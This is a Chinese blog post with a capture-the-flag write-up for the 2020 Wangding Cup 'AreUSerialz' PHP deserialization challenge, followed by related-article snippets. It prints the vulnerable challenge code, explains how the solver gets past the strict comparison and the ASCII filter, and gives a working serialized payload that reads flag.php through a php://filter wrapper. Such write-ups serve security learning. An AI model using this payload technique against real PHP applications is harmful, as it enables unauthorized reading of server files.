[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2025-06-10 23:27:52 发布
最新推荐文章于 2025-06-10 23:27:52 发布
阅读量164 收藏
点赞数
分类专栏: CTF # 反序列化 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62905261/article/details/126992586
版权 
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

反序列化漏洞详解_一句话木马的博客-优快云博客_反序列化漏洞

审计代码可以得知,应该要我们使用process()中的read()来读取flag,我们要用get传入str,其中obj是等于str的反序列化的值,除此之外,还需要绕过两个点,一个是__destruct(__destruct():构析函数,在对象的所有引用都被删除时或者对象都被显式销毁时调用,当对象被销毁时自动调用。)在__destruct魔术方法中,op==="2"是强比较,而process()使用的是弱比较op=="2",可以通过弱类型绕过,可以通过使用op=2来绕过,其中2是整数类型,op=2的时候op==="2"为false,op=="2"。而另一个需要绕过的地方就是is_valid()函数,is_valid()函数要求字符的ascii码必须是32-125,使用protected会在序列化后出现不可见字符\00*\00,不符合要求,使用public属性序列化不会出现不可见字符,故使用public来绕过,构造payload:

<?php

class FileHandler {
    
    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
}

$a=new FileHandler();
echo serialize($a);

?>

运行php代码得到结果:O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

构造payload:?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

利用get传入

在最下面发现了base64加密字符串

解密即得flag

[ 2020 青龙]AreUSerialz1
kw741951的博客
08-01 1062
分析此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法,所以write()方法也可以删除不用看, protected $content属性也可直接删了。根据代码逻辑分析,咱们可知 function __construct() {按照常规方法,首先,我们先将代码复制到本地进行序列化构造,$s的值ASCII码范围得在32<=$s<=125;根据构造函数is_valid($s) 可知,再根据构造函数read()可知,
BUUCTF [ 2020 青龙] AreUSerialz1
m0_74167420的博客
06-19 555
(2)对于FileHandler类,由于在反序列化中,先调用__destruct()析构方法,所以需要设计op的值绕过与 "2" 的强相等。(3)所以当op = 2时,一方面利用弱相等,可以调用read()方法和output()方法,另一方面也可以绕过强相等,避免执行在__destruct()时 op 赋值为 1。(1)get传参 "str",string转化为字符串,用 is_valid() 函数来进行过滤,要求传入的字符串的每一位字符的ASCII码都在32~125之间。1、阅读题目:php绕过类型。
web | CTF】BUUCTF [ 2020 青龙]AreUSerialz
weixin_46301214的博客
02-17 1226
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
2020青龙web AreUSerialz详解
永远是少年
12-20 1479
今天继续给大家介绍CTF刷题,本文主要内容是2020青龙web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
CTF刷题之[ 2020 青龙]AreUSerialz和easyupload
m0_64583632的博客
05-24 645
[ 2020 青龙]AreUSerialz和easyupload解题思路
[ 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3175
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
[ 2020 青龙]AreUSerialz 1
bazzza的博客
12-21 2392
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
BUUCTF [ 2020 青龙]AreUSerialz1
weixin_74410605的博客
08-20 599
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
2020--青龙-Web-AreUSerialz
aheyor的博客
10-31 868
这个题目不仅考察了对PHP反序列化的理解,还考察了代码审计和安全漏洞分析的能力。解决这个题目通常需要深入理解PHP的魔术方法和反序列化的原理,以及如何利用这些知识来绕过安全检查和执行非授权的操作。在解决这个题目时,关键在于理解反序列化的过程以及如何利用这个过程中可能存在的漏洞。参与者需要分析代码,找到反序列化的点,并利用这个点来执行某些操作,如读取敏感文件或执行系统命令。在这个题目中,参与者需要分析并解决一个涉及PHP反序列化漏洞的问题。类,其中包括几个关键的方法和属性。方法用于初始化类的属性,
2020青龙Boom
05-12
【标题】"2020青龙Boom" 涉及的是一个安全竞赛的场景,其中""是中国国内知名的安全技术大赛,旨在提升参赛者的安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
[ 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 832
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
守护数字世界:安全核心技术与实践策略
最新发布
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
06-10 452
本文剖析安全常见威胁如恶意软件、络钓鱼等,详述加密、防火墙等核心技术,给出建立安全策略等实践策略,展望人工智能、物联安全等未来趋势,助读者全面了解安全,提升防护能力与文件查找效率。
安全之内核初级对抗技术分析
anquan2233的博客
06-10 891
Windows 内核提供了多个强大的回调接口,可以用于监控或控制系统行为,其中 ObRegisterCallbacks 和 CmRegisterCallback 是两种最常用于进程保护和注册表监控的机制。本文会通过多个完整的驱动示例,演示如何利用这两种回调进行内核级防护,并分析它们在初级对抗中的实际应用效果与局限性。测试环境:win10内核回调机制是内核安全防护的重要成部分,但在面对有一定逆向能力和 Ring0 编写能力的攻击者时,其对抗能力仍存在上限。
安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 566
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数参数篡改以及邀请权限提升漏洞等
安全】Qt免杀样本分析
anquan2233的博客
06-06 1014
主程序(Qt)利用poolparty timer创建并调用shellcode,shellcode调用dll run函数,run函数给dll提权重新加载,提权后把shellcode注入winlogon.exe,在winlogon.exe中生成白加黑文件并为其创建计划任务(每两小时执行一次),白加黑文件重复前面所有,不过在run时就不需要提权了,因为计划任务是以SYSTEM身份运行的。
秋招Day12 - 计算机络 - 安全
weixin_54857540的博客
06-04 749
跨站请求伪造,挟持用户在当前已登陆的Web应用程序上执行非本意的操作。如何避免?检查请求头中规定Referer字段,Referer字段记录了HTTP请求的来源地址。在HTTP的请求参数中加入一个服务器随机生成的token,并在服务器端建立一个拦截器验证这个token,如果请求中没有token或者token内容不正确,就可能是CSRF攻击敏感操作多重校验,比如邮箱确认、验证码DoS就是Denial of Service,意思是拒绝服务。
企业通用安全管理制度
TechEnthusiast的博客
06-10 63
安全事件进行全面分析,找出根本原因。制定并实施整改措施,防止类似事件再次发生。必要时修订安全管理制度和技术措施。将事件处理经验纳入安全培训内容。
浅谈 Linux 防火墙:从原理到实践
vortex5的博客
06-05 1554
在 Docker 和 Kubernetes 环境中,nftables 和 Firewalld 因其动态性和与 CNI(容器络接口)的集成而更受欢迎。iptables 作为 Linux 防火墙的经典工具,以其灵活性和广泛支持奠定了坚实基础。通过状态跟踪、NAT 和日志等高级功能,它能应对复杂的安全需求。尽管 nftables 等新工具逐渐崛起,iptables 仍是学习和实践的必备技能。本文通过理论与实践结合,展示了其强大功能,读者可根据实际场景灵活应用。
2020青龙安全竞赛复盘
青龙”,这说明该压缩包内可能包含了与2020年5月10日举行的“”活动的青龙比赛相关的内容。 ### 深入知识点 - **安全竞赛**:可能是一个安全竞赛的名称,这类竞赛通常围绕着信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值